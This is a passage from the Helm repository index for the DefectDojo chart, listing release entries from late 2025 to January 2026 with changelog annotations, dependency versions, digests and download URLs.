repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.3 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 2b58e689693ee815827490f3eb00477692a0c9ed3f0f83551d7a524cd44df8b2 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.10-dev.tgz + version: 1.9.10-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.54.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.54.3 + created: "2026-01-26T17:31:10.235338971Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5ca7f5c1e4eb3400c0809d9e58551b1e9f949111dc913b92c82b998c59f7c3b8 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.54.3/defectdojo-1.9.9.tgz + version: 1.9.9 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.13.0 to v0.15.0 (_/defect_/Chart.yaml) + - kind: changed + description: chore(deps)_ update valkey _ tag from 0.15.0 to v0.15.1 (_/defect_/chart.yaml) + - kind: changed + description: chore(deps)_ update gcr.io/cloudsql__/gce_proxy _ tag from 1.37.11 to v1.37.12 (_/defect_/values.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.55.0-dev + created: "2026-01-26T05:15:52.56884291Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.1 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 461ee5d8111fffaaaaf42d170b25ff5a9d6cc0506e9b9f03bdd20a47fd368cca + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.9-dev.tgz + version: 1.9.9-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.54.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.54.2 + created: "2026-01-20T16:34:00.887236136Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: b95fe661ee28698ccf838c45c623faf570abd26cd0382755b0d0272533d4d491 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.54.2/defectdojo-1.9.8.tgz + version: 1.9.8 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Update valkey Docker tag from 0.13.0 to v0.15.0 (_/defect_/Chart.yaml) + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.55.0-dev + created: "2026-01-20T05:13:03.255066461Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.15.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 73a7c02be2b71568841ec77f7d3d935530d24b0886c92a4d6f527a32ec3b651a + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.8-dev.tgz + version: 1.9.8-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.54.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.54.1 + created: "2026-01-12T17:07:49.674311144Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 5c6d1c5af716cbb0388b991a94f20a1cb61da2ff1b6a82e41e534421baa283ce + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.54.1/defectdojo-1.9.7.tgz + version: 1.9.7 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.55.0-dev + created: "2026-01-12T05:13:52.921411554Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9daaf897f5af709a24fbe0d45f049e68761b74a04a93b1a833a32ad11a3019ea + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.7-dev.tgz + version: 1.9.7-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.54.0 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.54.0 + created: "2026-01-05T17:23:08.311468978Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 6c97164787b3973b283a6de698213a0f38d5c2d3e92ca05685f9e1e87f774c8b + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.54.0/defectdojo-1.9.6.tgz + version: 1.9.6 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.54.0-dev + created: "2026-01-05T05:22:19.434883602Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 104267b788ee3b4ad7cd546b6bb58605ec1c299241c244b6450dd76208e49c76 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.6-dev.tgz + version: 1.9.6-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.53.5 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.53.5 + created: "2025-12-29T17:01:23.805626893Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.10.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 36c05c82bbe9c2f326355d147f67371f723adb7285faaa46eeebe8ed4d768a74 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.53.5/defectdojo-1.9.5.tgz + version: 1.9.5 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.54.0-dev + created: "2025-12-29T05:17:43.801975715Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 8753e273feff1cdc3bd90a414e3db40510ca1c5245fd508d5bbbc829c5164f10 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.5-dev.tgz + version: 1.9.5-dev + - annotations: + artifacthub.io/changes: | + - kind: fixed + description: Drop 'replicas' when HPA is in place + - kind: changed + description: Bump DefectDojo to 2.53.4 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.53.4 + created: "2025-12-22T17:25:14.517752402Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.10.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 98b76e3251c52e71d8c70659d9cb9cd34d7a3705e05a5628bc0b731ccf7d652c + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.53.4/defectdojo-1.9.4.tgz + version: 1.9.4 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.54.0-dev + created: "2025-12-22T05:10:00.771636175Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.13.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 40cf8b33fb141aad964160b78f5bd06f11326ea7f0e3987b6fe946eb099e5513 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.4-dev.tgz + version: 1.9.4-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.53.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.53.3 + created: "2025-12-15T20:48:25.799673027Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.10.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f4d1d8e19ce5ead0da713cf579e9a85c408b4a1a69609a3ff67adf090479d480 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.53.3/defectdojo-1.9.3.tgz + version: 1.9.3 + - annotations: + artifacthub.io/changes: | + - kind: fixed + description: Use non-tilde notation of versions in subcharts + - kind: changed + description: Bump DefectDojo to 2.53.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.53.2 + created: "2025-12-15T16:45:57.924647328Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: 16.7.27 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: 0.10.2 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a1d63362a9297963c53ca0ec9193d7f8f310278a7b414e2962bf839b94af442d + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.53.2/defectdojo-1.9.2.tgz + version: 1.9.2 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.54.0-dev + created: "2025-12-15T05:14:22.465100207Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: ~0.10.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9f23265d585474b0ca50d02a1e224c2eb8f342b2643c65ea3c10d7bc31acf76c + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.2-dev.tgz + version: 1.9.2-dev + - annotations: + artifacthub.io/changes: | + - kind: deprecated + description: djnago.mediaPersistentVolume.fsGroup was removed because it was replaced with django.podSecurityContext.fsGroup + - kind: changed + description: Bump DefectDojo to 2.53.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.53.1 + created: "2025-12-08T17:20:40.460363494Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: ~0.10.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: fa74fa7eb9b31b0180aeeb0dcc76b8b1c9448a10bdff6c462be2c53c76c0228c + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.53.1/defectdojo-1.9.1.tgz + version: 1.9.1 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.54.0-dev + created: "2025-12-08T05:08:35.609379228Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: ~0.10.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: d520da13295cf736565e01e29b057469d126a13f606be3394324b859cc123251 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.1-dev.tgz + version: 1.9.1-dev + - annotations: + artifacthub.io/changes: | + - kind: added + description: Added HPA and PDB for celery worker and Django + - kind: fixed + description: extraAnnotations spec doesn't affect initializer job + - kind: changed + description: chore(deps)_ update gcr.io/cloudsql_docker/gce_proxy docker tag from 1.37.9 to v1.37.10 (helm/defectdojo/values.yaml) + - kind: changed + description: chore(deps)_ update nginx/nginx_prometheus_exporter docker tag from 1.4.2 to v1.5.1 (helm/defectdojo/values.yaml) + - kind: changed + description: Replace Redis with Valkey + - kind: changed + description: Bump DefectDojo to 2.53.0 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.53.0 + created: "2025-12-01T17:27:02.701403088Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: ~0.10.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: ca40fa76eaa2065b5d4074940d97f2116bd8e567e6b0681a8242ab89ee3dc3ac + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.53.0/defectdojo-1.9.0.tgz + version: 1.9.0 + - annotations: + artifacthub.io/changes: | + - kind: added + description: Added HPA and PDB for celery worker and Django + - kind: fixed + description: extraAnnotations spec doesn't affect initializer job + - kind: changed + description: chore(deps)_ update gcr.io/cloudsql_docker/gce_proxy docker tag from 1.37.9 to v1.37.10 (helm/defectdojo/values.yaml) + - kind: changed + description: chore(deps)_ update nginx/nginx_prometheus_exporter docker tag from 1.4.2 to v1.5.1 (helm/defectdojo/values.yaml) + - kind: changed + description: Replace Redis with Valkey + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.53.0-dev + created: "2025-12-01T05:13:20.000764907Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: valkey.enabled + name: valkey + repository: oci://registry-1.docker.io/cloudpirates + version: ~0.10.0 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 1b2fa79f8dad4e3a41a3dccb9663b0efbde881cbeeff05a2bd03173724e9a5a4 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.9.0-dev.tgz + version: 1.9.0-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.52.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.52.3 + created: "2025-11-24T17:05:50.208833306Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: a878713ce8ff5fb4057c25894a5da6abd701013683c7158ab705475cb05c3a1b + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.52.3/defectdojo-1.8.3.tgz + version: 1.8.3 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Location of HELM development hints has been changed + - kind: changed + description: Bump DefectDojo to 2.52.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.52.2 + created: "2025-11-17T15:38:22.259264234Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 3de47a7ae488ba65be5a346f8dbe4c38c97d0f6fe891fc0fc90c728868a022dc + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.52.2/defectdojo-1.8.2.tgz + version: 1.8.2 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.53.0-dev + created: "2025-11-14T05:11:09.167763954Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 0221d16ee21557e7a8adf4540858af8ab44dfef141e2a22ebe5ebc9c17830215 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.8.2-dev.tgz + version: 1.8.2-dev + - annotations: + artifacthub.io/changes: | + - kind: fixed + description: Broken rendering of media PVC + - kind: fixed + description: Typo in description of digests + - kind: changed + description: Bump DefectDojo to 2.52.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.52.1 + created: "2025-11-10T17:06:45.491640919Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: e813ee65d29e324192b3f6b9bf9742df09f3abc8f1d839480fff2d7bbb513058 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.52.1/defectdojo-1.8.1.tgz + version: 1.8.1 + - annotations: + artifacthub.io/changes: "" + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.53.0-dev + created: "2025-11-10T05:11:04.539253492Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 65e76262f1c525772e7059bf0305ba1159f5ddeb68cb6acf68dd63f33496bd33 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.8.1-dev.tgz + version: 1.8.1-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: DRY cloudsql-proxy + - kind: changed + description: Each component allow to specific image + allow digest pinning + allow different tags for Django and Nginx + - kind: added + description: Convert existing comments to descriptors + - kind: added + description: Testing on the oldest officially supported k8s + - kind: added + description: Checker for maximal number of celery beats + - kind: changed + description: Bump DefectDojo to 2.52.0 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.52.0 + created: "2025-11-03T18:56:29.749018945Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 9d7e25c9aec1a9d8460d562ffa317734727a9570db50f380d4b19efaff0386e9 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.52.0/defectdojo-1.8.0.tgz + version: 1.8.0 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: DRY cloudsql-proxy + - kind: changed + description: Each component allow to specific image + allow digest pinning + allow different tags for Django and Nginx + - kind: added + description: Convert existing comments to descriptors + - kind: added + description: Testing on the oldest officially supported k8s + - kind: added + description: Checker for maximal number of celery beats + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.52.0-dev + created: "2025-11-03T05:07:38.49281905Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 57261c9579f2d70cb139fe9018d06746ef1be0fbba4afa1d66959efd33a70ad3 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.8.0-dev.tgz + version: 1.8.0-dev + - annotations: + artifacthub.io/changes: | + - kind: changed + description: Bump DefectDojo to 2.51.3 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.51.3 + created: "2025-10-27T16:50:39.680289986Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: f3d364d9462387e4a6cb7f3311c703d5b4dc9fe7f4c3a091f0f74af0f39712fa + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.51.3/defectdojo-1.7.3.tgz + version: 1.7.3 + - annotations: + artifacthub.io/changes: | + - kind: fixed + description: Drop initialDelaySeconds if eq. zero + - kind: added + description: Add support for automountServiceAccountToken + - kind: changed + description: Bump DefectDojo to 2.51.2 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.51.2 + created: "2025-10-20T15:28:40.350528968Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: c9f76cf39a2630fb18cb6f23d0512b9dc59773f809d4e54a203d1422af8e9b86 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/2.51.2/defectdojo-1.7.2.tgz + version: 1.7.2 + - annotations: + artifacthub.io/changes: | + - kind: changed + description: DRY cloudsql-proxy + - kind: added + description: Testing on the oldest officially supported k8s + artifacthub.io/prerelease: "true" + apiVersion: v2 + appVersion: 2.52.0-dev + created: "2025-10-16T05:11:17.739511244Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 4901636333a880fe3ec35618e933faf5d1677d0e664b83b617555210128cf607 + icon: https://defectdojo.com/hubfs/DefectDojo_favicon.png + maintainers: + - email: defectdojo-project@owasp.org + name: madchap + url: https://github.com/DefectDojo/django-DefectDojo + name: defectdojo + urls: + - https://github.com/DefectDojo/django-DefectDojo/releases/download/nightly-dev/defectdojo-1.7.2-dev.tgz + version: 1.7.2-dev + - annotations: + artifacthub.io/changes: | + - kind: added + description: Add support for automountServiceAccountToken + - kind: changed + description: Bump DefectDojo to 2.51.1 + artifacthub.io/prerelease: "false" + apiVersion: v2 + appVersion: 2.51.1 + created: "2025-10-14T16:23:58.262423077Z" + dependencies: + - condition: postgresql.enabled + name: postgresql + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~16.7.0 + - condition: redis.enabled + name: redis + repository: oci://us-docker.pkg.dev/os-public-container-registry/defectdojo + version: ~19.6.4 + description: A Helm chart for Kubernetes to install DefectDojo + digest: 712a4003edcaedce1ea2ffc17f418fa8cbd2bef84aa6a5aa75ee18a0e5b51bc5 + icon: 